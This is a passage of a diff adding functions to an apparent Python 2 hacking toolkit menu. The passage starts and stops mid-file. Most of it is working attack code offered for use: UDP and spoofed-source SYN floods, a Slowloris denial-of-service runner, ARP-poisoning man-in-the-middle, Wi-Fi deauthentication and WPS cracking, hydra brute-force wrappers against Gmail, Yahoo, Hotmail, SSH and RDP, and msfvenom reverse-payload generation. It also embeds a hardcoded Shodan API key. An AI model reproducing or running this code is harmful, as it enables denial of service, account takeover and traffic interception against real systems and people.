os.system(ks) +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) +def wifite(): + os.system("wifite") +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +def netdev(): + os.system("netdiscover") +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +def sysinfo(): + os.system("ifconfig") + os.system("iwconfig") + os.system("neofetch") + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +def tcp(): + print Y+"-p = port | -t = threads | Example: tcp 95.52.541.1 -p 80 -t 600\033[0m" + print "\n" + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + print R+"IF YOU GET SPAMMED WITH ERRORS BUT ITS STILL RUNNING ITS FINE\033[0m" + os.system("sleep 5") + os.system("python /root/hackers-tool-kit/tools/" + tcp) +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() + +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " +-----------------------------+" + print " | MySQL Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) + + elif bhydra == '00' or bhydra == '0': + print "\n[!] Exit the Program..." + sys.exit() + + else: + print "\n[!] ERROR : Wrong Input" + time.sleep(1) + restart_program() +def cupp(): + os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") + print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" +def vdir(): + print "\n" + os.system("ls") + print Y+"! doesnt have to be these can be any directory !\033[0m" + print "\n" + h = raw_input("Directory Path: ") + print "\n" + print "--------------------------------------------------------------------------------------------------------------------------------------------" + os.system("ls " + h) + print "--------------------------------------------------------------------------------------------------------------------------------------------" + +def monoff(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng stop " + i) +def vpn(): + os.system("anonsurf start") + os.system("anonsurf myip") +def vpnoff(): + os.system("anonsurf stop") + os.system("anonsurf myip") +def slowl(): + de = raw_input("Delay: ") + tar = raw_input("RHOST: ") + port = raw_input("RPORT: ") + soc = raw_input("Sockets: ") + os.system('echo "use auxiliary/dos/http/slowloris\n" > slowl.rc') + os.system('echo "set delay {0}\n" >> slowl.rc'.format(de)) + os.system('echo "set RHOST {0}\n" >> slowl.rc'.format(tar)) + os.system('echo "set RPORT {0}\n" >> slowl.rc'.format(port)) + os.system('echo "set sockets {0}\n" >> slowl.rc'.format(soc)) + os.system('echo "run\n" >> slowl.rc') + os.system('msfconsole -r slowl.rc') + os.system('rm -rf slowl.rc') + +def pidox(): + print Y+"! USING FIREFOX !\033[0m" + os.system("sleep 2") + os.system("firefox https://pipl.com/") +def specnet(): + jk = raw_input("BSSID: ") + kj = raw_input("ESSID: ") + os.system("iwconfig") + k = raw_input("INTERFACE: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) + if j == "n": + a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) + os.system(a) +def pingen(): + j = raw_input("Enter BSSID: ") + a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) + os.system(a) +def reaver(): + os.system("iwconfig") + j = raw_input("Select Interface: ") + k = raw_input("Enter BSSID: ") + a = 'reaver -i {0} -b {1} -vv'.format(j,k) + os.system(a) +def deauth(): + print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" + j = raw_input("Enter BSSID> ") + os.system("iwconfig") + k = raw_input("Enter Interface> ") + a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) + os.system(a) +def macc(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -r " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def macoff(): + os.system("iwconfig") + k = raw_input("Interface: ") + c = 'ifconfig {0} down'.format(k) + os.system(c) + os.system("macchanger -p " + k) + s = 'ifconfig {0} up'.format(k) + os.system(s) +def arppois(): + + try: + os.system("iwconfig") + interface = raw_input("[*] Enter Interface: ") + victimIP = raw_input("[*] Enter Victim IP: ") + gateIP = raw_input("[*] Enter Router IP: ") + except KeyboardInterrupt: + print "\n[*] User Requested Shutdown" + print "[*] Exiting..." + os.system("clear") + mainbanner() + + print "\n[*] Enabling IP Forwarding...\n" + os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") + + def get_mac(IP): + conf.verb = 0 + ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1) + for snd,rcv in ans: + return rcv.sprintf(r"%Ether.src%") + + def reARP(): + + print "\n[*] Restoring Targets..." + victimMAC = get_mac(victimIP) + gateMAC = get_mac(gateIP) + send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7) + send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7) + print "[*] Disabling IP Forwarding..." + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[*] Shutting Down..." + os.system("clear") + mainbanner() + + def trick(gm, vm): + send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm)) + send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm)) + + def mitm(): + try: + victimMAC = get_mac(victimIP) + except Exception: + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[!] Couldn't Find Victim MAC Address" + print "[!] Exiting..." + os.system("clear") + mainbanner() + try: + gateMAC = get_mac(gateIP) + except Exception: + os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") + print "[!] Couldn't Find Gateway MAC Address" + print "[!] Exiting..." + os.system("clear") + mainbanner() + print "[*] Poisoning Targets..." + while 1: + try: + trick(gateMAC, victimMAC) + time.sleep(1.5) + except KeyboardInterrupt: + reARP() + break + mitm() +def sslscan(): + j = raw_input('Enter Target: ') + a = 'sslscan {0}'.format(j) + os.system(a) +def payload(): + os.system("cat /root/hackers-tool-kit/tools/payloads.txt") + print "\n" + f = raw_input("Select Payload: ") + l = raw_input("LHOST: ") + c = raw_input("LPORT: ") + os.system("cat /root/hackers-tool-kit/tools/formats.txt") + s = raw_input("Format: ") + h = raw_input("File Name: ") + a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) + os.system(a) +def crunch(): + print "minimal number of characters" + j = raw_input("[CRUNCH]: ") + print "maximum number of characters" + k = raw_input("[CRUNCH]: ") + print "what characters should be in it" + b = raw_input("[CRUNCH]: ") + print "name of file" + s = raw_input("[CRUNCH]: ") + a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) + os.system(a) + print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s +def traff(): + os.system("iwconfig") + s = raw_input("Select Interface: ") + os.system("tcpdump -i " + s) +def resa(): + j = raw_input("USERNAME: ") + k = raw_input("NEW PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'echo "{0}:{1}" | chpasswd'.format(j,k) + print "password for {0} has been reset".format(j) +def resu(): + j = raw_input("PASSWORD: ") + print "are you sure?" + q = raw_input("[y/n]: ") + if q == "n": + os.system("clear") + mainbanner() + if q == "y": + a = 'passwd {0}'.format(j) + print "unix password has been reset".format(j) +def hashid(): + #!/usr/bin/python + # encoding: utf-8 + # Hash Identifier v1.1 + # By Zion3R + # www.Blackploit.com + # Root@Blackploit.com + + logo=''' ######################################################################### + # __ __ __ ______ _____ # + # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # + # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # + # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # + # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # + # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # + # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # + # By Zion3R # + # www.Blackploit.com # + # Root@Blackploit.com # + #########################################################################''' + + algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} + + # hash.islower() minusculas + # hash.isdigit() numerico + # hash.isalpha() letras + # hash.isalnum() alfanumerico + + def CRC16(): + hs='4607' + if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101020") + def CRC16CCITT(): + hs='3d08' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101040") + def FCS16(): + hs='0e5b' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("101060") + + def CRC32(): + hs='b33fd057' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102040") + def ADLER32(): + hs='0607cb42' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102020") + def CRC32B(): + hs='b764a0d9' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102060") + def XOR32(): + hs='0000003f' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("102080") + + def GHash323(): + hs='80000000' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103040") + def GHash325(): + hs='85318985' + if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("103020") + + def DESUnix(): + hs='ZiY8YtDKXJwYQ' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: + jerar.append("104020") + + def MD5Half(): + hs='ae11fd697ec92c7c' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105060") + def MD5Middle(): + hs='7ec92c7c98de3fac' + if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: + jerar.append("105040") + def MySQL(): + hs='63cea4673fd25f46' + if 